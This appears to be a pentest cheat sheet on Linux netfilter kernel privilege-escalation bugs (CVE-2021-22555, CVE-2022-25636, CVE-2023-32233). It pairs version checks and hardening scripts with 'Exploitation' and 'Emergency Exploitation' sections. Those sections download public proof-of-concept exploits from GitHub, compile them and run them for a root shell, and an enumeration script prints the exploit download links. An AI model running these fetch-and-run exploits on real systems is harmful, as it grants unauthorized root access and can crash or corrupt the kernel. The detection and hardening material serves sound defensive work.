# Netfilter Kernel Exploits

## 🎯 Overview

Vulnerabilities in the Linux kernel's netfilter subsystem (the packet-filtering code behind iptables and nf_tables) give a local user root through kernel memory corruption; each bug below affects a specific range of kernel versions, together spanning 2.6 to 6.3.1.

## 🚨 Major Netfilter CVEs

### CVE-2021-22555 (Heap Out-of-Bounds)

* **Affected**: Linux kernels 2.6 - 5.11
* **Impact**: Local privilege escalation via heap corruption
* **Exploit**: Memory corruption in netfilter subsystem

### CVE-2022-25636 (Heap Out-of-Bounds Write)

* **Affected**: Linux kernels 5.4 - 5.6.10
* **Impact**: Root privileges via heap out-of-bounds write
* **Risk**: A failed attempt can corrupt kernel memory and leave the host needing a reboot

### CVE-2023-32233 (Use-After-Free)

* **Affected**: Linux kernels up to 6.3.1
* **Impact**: Use-After-Free of anonymous sets in `nf_tables`
* **Method**: Manipulating cleared anonymous sets

## 🔍 Kernel Version Detection

### Check Vulnerable Versions

```bash
# Check current kernel
uname -r

# The patterns below cover the upstream version ranges listed above. Distro kernels
# often carry backported fixes under an older version number, so treat a hit as
# "possibly vulnerable" and confirm against the distribution's security tracker.

# CVE-2021-22555 check (2.6 - 5.11)
uname -r | grep -qE '^(2\.6|3\.[0-9]+|4\.[0-9]+|5\.[0-9]|5\.1[01])\.' && echo "CVE-2021-22555 VULNERABLE"

# CVE-2022-25636 check (5.4 - 5.6.10; 5.6.11 and later are fixed)
uname -r | grep -qE '^5\.[45]\.|^5\.6\.([0-9]|10)($|[^0-9])' && echo "CVE-2022-25636 VULNERABLE"

# CVE-2023-32233 check (up to 6.3.1; 6.3.2 and later are fixed)
uname -r | grep -qE '^[2-5]\.|^6\.[0-2]\.|^6\.3\.[01]($|[^0-9])' && echo "CVE-2023-32233 VULNERABLE"
```

## 🚀 Exploitation Methods

### CVE-2021-22555 Exploitation

```bash
# Download exploit
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c

# Compile (32-bit static)
gcc -m32 -static exploit.c -o exploit

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)
```

### CVE-2022-25636 Exploitation

```bash
# Download exploit
git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636

# Compile and execute
make
./exploit

# ⚠️ WARNING: Can corrupt kernel!
```

### CVE-2023-32233 Exploitation

```bash
# Download exploit
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233

# Compile with required libraries
gcc -Wall -o exploit exploit.c -lmnl -lnftnl

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)
```

## 🔍 Detection & Enumeration

### Netfilter Vulnerability Check

```bash
#!/bin/bash
echo "=== NETFILTER KERNEL EXPLOITS CHECK ==="

kernel=$(uname -r)
echo "Kernel version: $kernel"
echo "(version checks flag possibly vulnerable kernels; distro backports may already carry the fix)"

# CVE-2021-22555 (2.6 - 5.11)
if echo "$kernel" | grep -qE '^(2\.6|3\.[0-9]+|4\.[0-9]+|5\.[0-9]|5\.1[01])\.'; then
    echo "[!] CVE-2021-22555 VULNERABLE"
    echo "    Download: https://github.com/google/security-research"
fi

# CVE-2022-25636 (5.4 - 5.6.10)
if echo "$kernel" | grep -qE '^5\.[45]\.|^5\.6\.([0-9]|10)($|[^0-9])'; then
    echo "[!] CVE-2022-25636 VULNERABLE (CAUTION: Can corrupt kernel)"
    echo "    Download: https://github.com/Bonfee/CVE-2022-25636"
fi

# CVE-2023-32233 (up to 6.3.1)
if echo "$kernel" | grep -qE '^[2-5]\.|^6\.[0-2]\.|^6\.3\.[01]($|[^0-9])'; then
    echo "[!] CVE-2023-32233 VULNERABLE"
    echo "    Download: https://github.com/Liuk3r/CVE-2023-32233"
fi

echo "[+] Checking dependencies:"
which gcc 2>/dev/null && echo "GCC available"
# libmnl/libnftnl are needed to build the CVE-2023-32233 PoC (deb- and rpm-based hosts)
dpkg -l 2>/dev/null | grep -E '(libmnl|libnftnl)' | head -2
rpm -qa 2>/dev/null | grep -E '(libmnl|libnftnl)' | head -2
```
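String patterns can only approximate a version range (5.6.10 is in range for CVE-2022-25636, 5.6.11 is not). The script below is an added example, not code from the original page: it parses the `uname -r` release into a numeric key and compares it against the same ranges the page lists for the three CVEs. The function names `kver_key`, `in_range` and `netfilter_cves` are this example's own; the version ranges are the page's.

```bash
#!/bin/sh
# Added example: numeric kernel version check for the three netfilter CVEs.
# Ranges are the ones stated on this page; function names are this example's own.

# kver_key RELEASE -> major*1000000 + minor*1000 + patch
# e.g. "5.6.10-generic" -> 5006010, "2.6.32" -> 2006032, "5.4" -> 5004000
kver_key() {
    v=${1%%-*}          # drop a "-150-generic" or "-rc1" style suffix
    v=${v%%+*}          # drop a "+" local-version suffix, if any
    maj=${v%%.*}; rest=${v#*.}
    min=${rest%%.*}
    case "$rest" in
        *.*) pat=${rest#*.}; pat=${pat%%.*} ;;   # keep only the third component
        *)   pat=0 ;;
    esac
    echo $(( maj * 1000000 + min * 1000 + pat ))
}

# in_range KEY LOW HIGH -> exit 0 when LOW <= KEY <= HIGH
in_range() { [ "$1" -ge "$2" ] && [ "$1" -le "$3" ]; }

# netfilter_cves RELEASE -> prints one CVE id per line for every range that
# contains RELEASE; prints nothing when none does. Distributions backport fixes
# without bumping the upstream version, so a hit means "possibly affected".
netfilter_cves() {
    k=$(kver_key "$1")
    in_range "$k" "$(kver_key 2.6.0)" "$(kver_key 5.11.999)" && echo "CVE-2021-22555"
    in_range "$k" "$(kver_key 5.4.0)" "$(kver_key 5.6.10)"   && echo "CVE-2022-25636"
    in_range "$k" "$(kver_key 2.6.0)" "$(kver_key 6.3.1)"    && echo "CVE-2023-32233"
    return 0
}

# Usage: check the running kernel
release=$(uname -r)
echo "Kernel $release:"
hits=$(netfilter_cves "$release")
if [ -n "$hits" ]; then
    echo "$hits" | sed 's/^/  [!] possibly affected: /'
else
    echo "  [+] outside every range listed above"
fi
```

A hit is a prompt to look up the CVE in the distribution's package changelog (`apt changelog linux-image-$(uname -r)` or `rpm -q --changelog kernel | grep CVE-`), which is where a backported fix shows up that the version number does not.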

### Netfilter Service Check

```bash
# Check if netfilter/iptables active (legacy iptables and nftables rule sets)
iptables -L 2>/dev/null | head -5
nft list ruleset 2>/dev/null | head -5
systemctl status netfilter-persistent 2>/dev/null
# Loaded modules are named nf_*, nft_* and x_tables; "grep netfilter" would match nothing
lsmod | grep -E '^(nf_|nft_|x_tables|ip_tables|ip6_tables)'
```

## 🔑 Quick Reference

### Immediate Checks

```bash
# Kernel vulnerability quick check (version match only; distro backports may already fix it)
uname -r | grep -qE '^(2\.6|3\.[0-9]+|4\.[0-9]+|5\.[0-9]|5\.1[01])\.' && echo "CVE-2021-22555"
uname -r | grep -qE '^5\.[45]\.|^5\.6\.([0-9]|10)($|[^0-9])' && echo "CVE-2022-25636"
uname -r | grep -qE '^[2-5]\.|^6\.[0-2]\.|^6\.3\.[01]($|[^0-9])' && echo "CVE-2023-32233"

# Compilation capability
which gcc
```

### Emergency Exploitation

```bash
# CVE-2021-22555 (safest, wide range)
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploit

# CVE-2023-32233 (newer kernels)
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
./exploit
```

## ⚠️ Critical Warnings

### Kernel Exploit Risks

* **System instability** - Can crash the system
* **Kernel corruption** - May require reboot
* **Production danger** - Never run on production systems
* **Testing recommended** - Test in controlled environments

### Exploitation Considerations

* **CVE-2022-25636** - Highest risk of kernel corruption
* **CVE-2021-22555** - Most stable, widest kernel range
* **CVE-2023-32233** - Newest, targets recent kernels
* **Dependencies** - Some require specific libraries (libmnl, libnftnl)

## 🛡️ Defensive Measures

### Kernel Updates

```bash
# Check available kernel updates
apt list --upgradable | grep linux-image
dnf check-update kernel

# Update kernel (requires reboot)
sudo apt update && sudo apt upgrade linux-image-generic
```

### Netfilter Hardening

```bash
# List the loaded netfilter modules (named nf_*, nft_*, x_tables; not "netfilter")
lsmod | grep -E '^(nf_|nft_|x_tables|ip_tables|ip6_tables)'
# Prevent a netfilter module the host does not use from loading (only when nftables/firewalld is not in use)
echo 'install nf_tables /bin/true' | sudo tee /etc/modprobe.d/disable-nf_tables.conf
# Monitor the kernel log for the oops/BUG traces that failed kernel exploit attempts leave behind
journalctl -k | grep -E 'BUG:|Oops|general protection fault'
# Confirm KASLR is active ("nokaslr" must not be on the kernel command line) and kernel pointers are hidden
grep -qw nokaslr /proc/cmdline && echo "KASLR disabled" || echo "KASLR enabled"
sysctl kernel.kptr_restrict   # 1 or 2 hides kernel addresses from unprivileged readers
# grsecurity/PaX add further memory-safety mitigations where those patchsets are available
```
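The hardening notes above are easier to act on as a repeatable audit. The script below is an added example and not code from the original page or from any of the exploit repositories it links. It checks the three things a defender can verify without rebooting: whether unprivileged user namespaces are restricted (all three CVEs need CAP_NET_ADMIN, which an unprivileged local user normally obtains by creating a user namespace, so this is the usual entry point), which netfilter modules are loaded, and whether KASLR was switched off on the kernel command line. The function names and the optional `ROOT` prefix (a staged copy of `/proc`, used for testing; the live system when omitted) are this example's own.

```bash
#!/bin/sh
# Added example: audit the mitigations that matter against netfilter kernel bugs.
# Each function takes an optional ROOT prefix so it can read a staged /proc copy.

# userns_state [ROOT] -> "restricted" or "open"
userns_state() {
    root=${1:-}
    max=$(cat "$root/proc/sys/user/max_user_namespaces" 2>/dev/null || echo unknown)
    # Debian/Ubuntu-specific knob; absent on other distributions, so default to "allowed"
    clone=$(cat "$root/proc/sys/kernel/unprivileged_userns_clone" 2>/dev/null || echo 1)
    if [ "$max" = 0 ] || [ "$clone" = 0 ]; then echo restricted; else echo open; fi
}

# nf_modules_loaded [ROOT] -> space-separated netfilter module names from /proc/modules
nf_modules_loaded() {
    root=${1:-}
    awk '$1 ~ /^(nf_|nft_|x_tables|ip_tables|ip6_tables)/ { print $1 }' \
        "$root/proc/modules" 2>/dev/null | tr '\n' ' ' | sed 's/ $//'
}

# kaslr_state [ROOT] -> "disabled" when nokaslr is on the kernel command line, else "enabled"
kaslr_state() {
    root=${1:-}
    if grep -qw nokaslr "$root/proc/cmdline" 2>/dev/null; then echo disabled; else echo enabled; fi
}

# nf_audit [ROOT] -> one line per finding; exit status 1 when something needs attention
nf_audit() {
    root=${1:-}; rc=0
    if [ "$(userns_state "$root")" = open ]; then
        echo "[!] unprivileged user namespaces allowed" \
             "(sysctl -w user.max_user_namespaces=0, or kernel.unprivileged_userns_clone=0 on Debian/Ubuntu)"
        rc=1
    else
        echo "[+] unprivileged user namespaces restricted"
    fi
    mods=$(nf_modules_loaded "$root")
    if [ -n "$mods" ]; then
        echo "[i] netfilter modules loaded: $mods (blacklist unused ones via /etc/modprobe.d)"
    fi
    if [ "$(kaslr_state "$root")" = disabled ]; then
        echo "[!] KASLR disabled via nokaslr on the kernel command line"; rc=1
    else
        echo "[+] KASLR enabled"
    fi
    return $rc
}

# Usage: audit the live system
nf_audit || echo "[!] one or more mitigations missing"
```

Setting `user.max_user_namespaces=0` also disables rootless containers and browser sandboxes that depend on user namespaces, so confirm nothing on the host needs them before applying it; on hosts that do, patching the kernel remains the fix and the audit's other two findings still apply.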

***

*Netfilter kernel exploits target the network filtering subsystem - these kernel-level vulnerabilities provide direct root access but carry significant system stability risks and should be used with extreme caution.*
